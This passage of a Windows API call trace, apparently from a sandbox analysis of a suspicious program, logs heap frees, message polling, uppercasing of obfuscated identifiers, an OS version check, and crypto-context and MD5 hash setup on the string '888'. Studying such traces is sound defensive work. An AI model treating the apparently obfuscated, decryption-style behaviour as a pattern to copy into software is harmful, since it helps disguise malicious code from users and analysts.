returned 1 [0212.634] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.634] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0212.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f08 | out: hHeap=0x2af0000) returned 1 [0212.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0212.635] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0212.635] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0212.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f08 | out: hHeap=0x2af0000) returned 1 [0212.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0212.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1b8 | out: hHeap=0x2af0000) returned 1 [0212.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab230 | out: hHeap=0x2af0000) returned 1 [0212.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3e0 | out: hHeap=0x2af0000) returned 1 [0212.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0212.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0212.635] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0212.635] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.635] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0212.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f08 | out: hHeap=0x2af0000) returned 1 [0212.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0212.635] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0212.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0212.635] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0212.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d78 | out: hHeap=0x2af0000) returned 1 [0212.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0212.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab380 | out: hHeap=0x2af0000) returned 1 [0212.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab290 | out: hHeap=0x2af0000) returned 1 [0212.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1e8 | out: hHeap=0x2af0000) returned 1 [0212.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0212.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0212.636] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0212.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ea40 | out: hHeap=0x2af0000) returned 1 [0212.636] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0212.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0212.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab230 | out: hHeap=0x2af0000) returned 1 [0212.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3f8 | out: hHeap=0x2af0000) returned 1 [0212.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab260 | out: hHeap=0x2af0000) returned 1 [0212.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c18 | out: hHeap=0x2af0000) returned 1 [0212.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0212.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0212.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab320 | out: hHeap=0x2af0000) returned 1 [0212.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0212.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab260 | out: hHeap=0x2af0000) returned 1 [0212.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab308 | out: hHeap=0x2af0000) returned 1 [0212.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3b0 | out: hHeap=0x2af0000) returned 1 [0212.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0212.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0212.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0212.636] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab320 | out: hHeap=0x2af0000) returned 1 [0212.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3b0 | out: hHeap=0x2af0000) returned 1 [0212.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0212.637] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0212.637] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0212.637] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3f8 | out: hHeap=0x2af0000) returned 1 [0212.637] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab290 | out: hHeap=0x2af0000) returned 1 [0212.637] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2a8 | out: hHeap=0x2af0000) returned 1 [0212.637] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0212.637] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab308 | out: hHeap=0x2af0000) returned 1 [0212.637] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0212.637] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3c8 | out: hHeap=0x2af0000) returned 1 [0212.637] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d78 | out: hHeap=0x2af0000) returned 1 [0212.637] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0212.637] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.637] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0212.637] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.637] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0212.637] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f30 | out: hHeap=0x2af0000) returned 1 [0212.637] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0212.637] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0212.637] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab290 | out: hHeap=0x2af0000) returned 1 [0212.638] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0212.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0212.638] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0212.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f30 | out: hHeap=0x2af0000) returned 1 [0212.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0212.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab188 | out: hHeap=0x2af0000) returned 1 [0212.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2c0 | out: hHeap=0x2af0000) returned 1 [0212.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3b0 | out: hHeap=0x2af0000) returned 1 [0212.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0212.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0212.638] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0212.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0212.638] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0212.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0212.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0212.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab320 | out: hHeap=0x2af0000) returned 1 [0212.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab230 | out: hHeap=0x2af0000) returned 1 [0212.638] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0212.638] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.638] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.638] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.638] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0212.638] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0212.638] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.639] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0212.639] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0212.639] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0212.639] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0212.639] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0212.639] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0212.639] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0212.639] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f6f20, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0212.639] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0212.639] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f6f80, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0212.639] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa7ca18) returned 1 [0212.640] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.640] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.640] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0212.640] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0212.640] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0212.640] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0212.640] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0212.640] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0212.640] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.640] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.640] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.640] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0212.640] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0212.640] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0212.641] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0212.641] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0212.641] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0212.641] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.641] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.641] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.641] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.641] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0212.641] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.641] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0212.641] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.641] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.641] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.641] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.641] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.641] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.641] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.641] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0212.641] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.641] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0212.641] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.641] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.642] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0212.642] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0212.642] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0212.642] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0212.642] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0212.642] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.642] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.642] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0212.642] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0212.642] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0212.642] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0212.642] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0212.642] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0212.642] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.642] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.642] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.642] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0212.642] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.642] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0212.642] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.642] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.642] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0212.642] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.643] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0212.643] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.643] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.643] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0212.643] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0212.643] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aab6e0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0212.643] CryptCreateHash (in: hProv=0xa7ca18, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0212.643] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.643] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.643] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.643] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.643] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 